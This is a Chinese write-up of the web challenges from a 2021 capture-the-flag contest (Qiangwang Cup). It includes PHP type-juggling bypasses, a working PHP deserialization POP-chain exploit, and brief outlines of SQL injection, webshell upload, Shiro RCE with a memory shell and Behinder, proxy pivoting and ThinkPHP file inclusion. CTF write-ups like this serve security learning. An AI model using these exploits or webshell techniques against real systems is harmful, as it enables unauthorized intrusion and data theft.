第五屆強網杯WEB Writeup
阿新 • • 發佈:2021-06-15
WEB
0x01 [強網先鋒]尋寶
根據題目資訊可以知道,需要從中獲取兩個KEY,然後獲得flag
題目原始碼
<?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); function filter($string){ $filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000'); $filter_phrase= '/'.implode('|',$filter_word).'/'; return preg_replace($filter_phrase,'',$string); } if($ppp){ unset($ppp); } $ppp['number1'] = "1"; $ppp['number2'] = "1"; $ppp['nunber3'] = "1"; $ppp['number4'] = '1'; $ppp['number5'] = '1'; extract($_POST); $num1 = filter($ppp['number1']); $num2 = filter($ppp['number2']); $num3 = filter($ppp['number3']); $num4 = filter($ppp['number4']); $num5 = filter($ppp['number5']); if(isset($num1) && is_numeric($num1)){ die("非數字"); } else{ if($num1 > 1024){ echo "第一層"; if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){ echo "第二層"; if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){ echo "第三層"; if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){ echo "第四層"; if(!isset($num5)||(strlen($num5)==0)) die("no"); $b=json_decode(@$num5); if($y = $b === NULL){ if($y === true){ echo "第五層"; include 'KeY1lhv.php'; echo $KEY1; } }else{ die("no"); } }else{ die("no"); } }else{ die("no"); } }else{ die("no"); } }else{ die("no111"); } }
KEY1:
第一層,字串比較,構造$num1=1027a繞過
第二層,需要繞過 intval() ,使用科學計數法繞過 $num2=6e5
第三層,寫指令碼跑md5, $num3=61823470
import hashlib def md5_encode(num3): return hashlib.md5(num3.encode()).hexdigest()[0:7] for i in range(60000000,700000000): num3 = md5_encode(str(i)) # print(num3) if num3 == '4bf21cd': print(i) break
第四層,同樣使用科學計數法繞過,構造$num4=0e00000
第五層,利用json_decode在解析非json格式資料的時候會自動置NULL繞過, 構造$num5=aaa
得到KEY1:KEY1{e1e1d3d40573127e9ee0480caf1283d6}
KEY2:
根據題目描述,使用支援自動分片下載的工具下載檔案
解壓後得到一堆docx檔案
隨便開啟一個發現是一堆字元,猜測KEY2就在其中某一個檔案中,寫指令碼跑
exp
import os import docx for i in range(1,20): for j in range(1,20): path = "./5.{0}/VR_{1}".format(i,j) files = os.listdir(path) # print(filePath) for file in files: try: fileName = path+"/"+file # print(fileName) file = docx.Document(fileName) for content in file.paragraphs: # print(content.text) if "KEY2{" in content.text: print(content.text) print(fileName) break except: pass
得到KEY2 : KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}
在原頁面上提交獲取flag:
0x02 [強網先鋒]賭徒
根據提示,掃目錄在www.zip下得到原始碼
index.php
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}
class Info
{
private $phonenumber=123123;
public $promise='I do';
public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}
?>
分析原始碼後,發現是php反序列化,構造pop鏈如下
<?php
error_reporting(1);
class Start
{
public $name='guest';
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag."\n\n";
return ;
}
}
class Info
{
public $promise='I do';
public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
$start=new Start();
$info=new Info();
$room=new Room();
$info->file['filename']=$room;
$start->name=$info;
$room->a=$room;
$room->sth_to_set=$start;
echo serialize($room);
?>
base64解碼後得到flag(注:前面有個hi,要將其剔除在解碼)
0x03 EasyWeb
掃埠發現還有36842開放
登入頁面使用者名稱出存在sql注入,sqlmap一把梭,即可獲取使用者名稱,密碼
登入進後臺,掃目錄發現上傳路由
構造上傳,蟻劍連線
使用ew代理出來後掃描埠 ,發現8006開放著jboss服務
獲取flag
0x04 Hard_Penetration
shiro rce,注入記憶體馬後使用冰蠍連線,發現當前使用者為ctf,無法讀取flag,於是使用ew代理出來掃埠,在8005埠有一個php站點,發現為TP3.1.3開發的CMS,審計原始碼後發現存在檔案包含
構造shell去包含
使用蟻劍連線,獲得flag